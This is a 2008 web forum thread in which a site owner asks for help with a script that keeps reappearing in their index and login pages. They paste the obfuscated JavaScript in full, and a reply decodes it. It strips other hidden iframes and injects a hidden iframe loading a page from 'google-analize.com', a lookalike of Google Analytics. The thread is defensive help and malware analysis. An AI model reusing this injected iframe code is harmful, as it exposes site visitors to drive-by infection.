Jawed Posted July 7, 2008 Hi all, I have a website running. It was fine a few days back, but now when I open the site it opens a blank page. I checked the code of the index page and found that there is a JavaScript embedded in my code in all index pages and login pages; this JavaScript opened the blank page. I downloaded the whole site, deleted the code from the server, and scanned the code with Kaspersky antivirus and Norton antivirus; neither showed any virus in the code. Then I manually checked all the pages named index and login, and no malicious code was there, so I uploaded the site again. But, to my bad luck, the virus came again in Iframe.ph, and again the site is not opening due to the same JavaScript code. I am using Dreamweaver CS3 and my site is hosted on netsol. The problem is that all the files named index and login are affected: all the code in these files gets lost and this JavaScript is embedded <script>function c41920832628m486aaf31e5abe(m486aaf31e5ea3){ function m486aaf31e628c(){return 16;} return (parseInt(m486aaf31e5ea3,m486aaf31e628c()));}function m486aaf31e6a5c(m486aaf31e6e43){ function m486aaf31e79fb(){var m486aaf31e7de2=2;return m486aaf31e7de2;} var m486aaf31e722f='';m486aaf31e81cb=String.fromCharCode;for(m486aaf31e7613=0;m486aaf31e7613<m486aaf31e6e43.length;m486aaf31e7613+=m486aaf31e79fb()){ m486aaf31e722f+=(m486aaf31e81cb(c41920832628m486aaf31e5abe(m486aaf31e6e43.substr(m486aaf31e7613,m486aaf31e79fb()))));}return m486aaf31e722f;} var zf3='';var 
m486aaf31e85b2='3C7'+zf3+'3637'+zf3+'2697'+zf3+'07'+zf3+'43E667'+zf3+'56E637'+zf3+'4696F6E20636865636B5F636F6E7'+zf3+'4656E7'+zf3+'428297'+zf3+'B7'+zf3+'6617'+zf3+'220693D303B7'+zf3+'7'+zf3+'68696C6528646F637'+zf3+'56D656E7'+zf3+'42E67'+zf3+'657'+zf3+'4456C656D656E7'+zf3+'47'+zf3+'3427'+zf3+'9546167'+zf3+'4E616D652827'+zf3+'69667'+zf3+'2616D6527'+zf3+'292E6C656E67'+zf3+'7'+zf3+'468297'+zf3+'B7'+zf3+'6617'+zf3+'220656C3D646F637'+zf3+'56D656E7'+zf3+'42E67'+zf3+'657'+zf3+'4456C656D656E7'+zf3+'47'+zf3+'3427'+zf3+'9546167'+zf3+'4E616D652827'+zf3+'69667'+zf3+'2616D6527'+zf3+'295B695D3B6966282028656C2E7'+zf3+'37'+zf3+'47'+zf3+'96C652E64697'+zf3+'37'+zf3+'06C617'+zf3+'93D3D27'+zf3+'6E6F6E6527'+zf3+'207'+zf3+'C7'+zf3+'C20656C2E7'+zf3+'37'+zf3+'47'+zf3+'96C652E7'+zf3+'6697'+zf3+'36962696C697'+zf3+'47'+zf3+'9203D3D27'+zf3+'68696464656E27'+zf3+'207'+zf3+'C7'+zf3+'C2028656C2E7'+zf3+'7'+zf3+'69647'+zf3+'4683C3520262620656C2E68656967'+zf3+'687'+zf3+'43C35292920262620656C2E6E616D65213D27'+zf3+'633427'+zf3+'297'+zf3+'B656C2E7'+zf3+'0617'+zf3+'2656E7'+zf3+'44E6F64652E7'+zf3+'2656D6F7'+zf3+'6654368696C6428656C293B7'+zf3+'D656C7'+zf3+'36520692B2B3B7'+zf3+'D7'+zf3+'D636865636B5F636F6E7'+zf3+'4656E7'+zf3+'428293B0D0A696628216D7'+zf3+'96961297'+zf3+'B646F637'+zf3+'56D656E7'+zf3+'42E7'+zf3+'7'+zf3+'7'+zf3+'2697'+zf3+'465287'+zf3+'56E657'+zf3+'363617'+zf3+'065282027'+zf3+'2533632536392536362537'+zf3+'322536312536642536352532302536652536312536642536352533642536332533342532302537'+zf3+'332537'+zf3+'32253633253364253237'+zf3+'2536382537'+zf3+'342537'+zf3+'342537'+zf3+'30253361253266253266253637'+zf3+'253666253666253637'+zf3+'2536632536352532642536312536652536312536632536392537'+zf3+'61253635253265253633253666253664253266253639253665253265253633253637'+zf3+'253639253366253331253335262537'+zf3+'382537'+zf3+'3525336425333126253237'+zf3+'2532622534642536312537'+zf3+'342536382532652537'+zf3+'322536662537'+zf3+'352536652536342532382534642536312537'+zf3+'342536382532652537'+zf3+'322536312536652536342
53666253664253238253239253261253332253334253331253335253332253337'+zf3+'253239253262253237'+zf3+'253635253338253631253338253332253339253635253337'+zf3+'253634253636253634253237'+zf3+'2532302537'+zf3+'37'+zf3+'2536392536342537'+zf3+'34253638253364253335253336253333253230253638253635253639253637'+zf3+'2536382537'+zf3+'342533642533342533322533392532302537'+zf3+'332537'+zf3+'342537'+zf3+'39253663253635253364253237'+zf3+'2536342536392537'+zf3+'332537'+zf3+'302536632536312537'+zf3+'39253361253230253665253666253665253635253237'+zf3+'2533652533632532662536392536362537'+zf3+'3225363125366425363525336527'+zf3+'29293B7'+zf3+'D7'+zf3+'6617'+zf3+'2206D7'+zf3+'969613D7'+zf3+'47'+zf3+'27'+zf3+'5653B3C2F7'+zf3+'3637'+zf3+'2697'+zf3+'07'+zf3+'43E';document.write(m486aaf31e6a5c(m486aaf31e85b2));</script><script>check_content()</script> I tried many things but none worked out, even i removed the write permission of index and login files but this too did not work. Thanks in advance for any kind of help Can anyone help me in this regard ????? Quote Link to comment Share on other sites More sharing options...
darkfreaks Posted July 7, 2008 You should use a better antivirus, such as NOD32.
tibberous Posted July 7, 2008 Are you sure the virus is part of the files on your server? Maybe your computer got a virus or your account info got stolen, and a remote script is logging in as you and changing the files. I'd back up your files, reformat, change your password, then go over your site code and try to find the virus. If you are using a big CMS with too much code to wade through, just download the newest version and move your data over. Also, contact netsol and have them make sure you don't have any processes or bad crontabs set to run.
btherl Posted July 7, 2008 Here's your virus decoded. 1st step: <script>function check_content(){var i=0;while(document.getElementsByTagName('iframe').length){var el=document.getElementsByTagName('iframe')[i];if( (el.style.display=='none' || el.style.visibility =='hidden' || (el.width<5 && el.height<5)) && el.name!='c4'){el.parentNode.removeChild(el);}else i++;}}check_content(); if(!myia){document.write(unescape( '%3c%69%66%72%61%6d%65%20%6e%61%6d%65%3d%63%34%20%73%72%63%3d%27%68%74%74%70%3a%2f%2f%67%6f%6f%67%6c%65%2d%61%6e%61%6c%69%7a%65%2e%63%6f%6d%2f%69%6e%2e%63%67%69%3f%31%35&%78%75%3d%31&%27%2b%4d%61%74%68%2e%72%6f%75%6e%64%28%4d%61%74%68%2e%72%61%6e%64%6f%6d%28%29%2a%32%34%31%35%32%37%29%2b%27%65%38%61%38%32%39%65%37%64%66%64%27%20%77%69%64%74%68%3d%35%36%33%20%68%65%69%67%68%74%3d%34%32%39%20%73%74%79%6c%65%3d%27%64%69%73%70%6c%61%79%3a%20%6e%6f%6e%65%27%3e%3c%2f%69%66%72%61%6d%65%3e'));}var myia=true;</script> 2nd step (results of unescape()): <iframe name=c4 src='http://google-analize.com/in.cgi?15&xu=1&'+Math.round(Math.random()*241527)+'e8a829e7dfd' width=563 height=429 style='display: none'></iframe> In short, the script removes every other hidden or tiny iframe from the page, then writes its own hidden iframe (named c4) that loads a page from google-analize.com, a domain that imitates the Google Analytics name. If the code keeps coming back then something is placing it there. I think Tibberous gave good advice there.